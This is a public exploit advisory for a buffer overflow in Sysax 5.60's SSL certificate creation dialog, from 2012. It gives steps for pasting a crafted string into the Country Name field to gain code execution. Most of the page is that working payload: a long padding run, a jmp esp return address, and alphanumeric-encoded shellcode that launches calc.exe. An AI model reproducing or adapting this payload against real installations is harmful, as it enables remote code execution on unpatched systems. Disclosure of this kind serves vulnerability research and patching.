Sysax 5.60 Create SSL Certificate Buffer Overflow

2012.06.05
Credit: Craig Freyman
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

#Title: Sysax <= 5.60 Create SSL Certificate Buffer Overflow #Author: Craig Freyman (@cd1zz) #Tested on: Windows XP SP3 #Discovered: May 29, 2012 #Vendor notified: May 30, 2012 #Details: http://www.pwnag3.com/2012/06/sysax-create-ssl-certificate-buffer.html #Go to Manage Server Settings -> Security Settings Configure -> Create Certificate -> <Paste the value below into the Country Name field> #You will get an error, click OK and voila, code execution #calc.exe shell32.ll jmp esp 7cb97475 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAut?|GGGGGGGGGGGGGG???t$YIIIICCCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLJHK9S030EPU0MYKUVQ9BE4LKPRVPLK1BTLLKQBUDLKBR184ONWQZ1601KOVQYPNL7LE13LERFLWPIQ8O4MC1O7JBZPQBV7LKF220LKW2GLEQN0LK1P48LE9P2TPJS1XPPPLKW8DXLK0XWPEQ8SKS7L0ILKFTLKUQXV6QKOFQ9PNL9QHO4M5QYW08M03EJTS3SML8WKSMVDT5M2QHLK68Q431HS3VLKDLPKLK0X5L318SLKTDLK5QN0K9PDQ46DQKQK3QQI0ZV1KOKP68QOPZLKB2ZKLFQM2J5QLMMUH930EPUPV0BHVQLK2OK7KOXUOKZPOEY20VU8Y6Z5OMMMKON5GL5VCL5ZMPKKKPT55UOKPG23D2RORJ30QCKO8UBC51RLSSVNBE3H55UPAAGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG

References:

http://www.pwnag3.com/2012/06/sysax-create-ssl-certificate-buffer.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top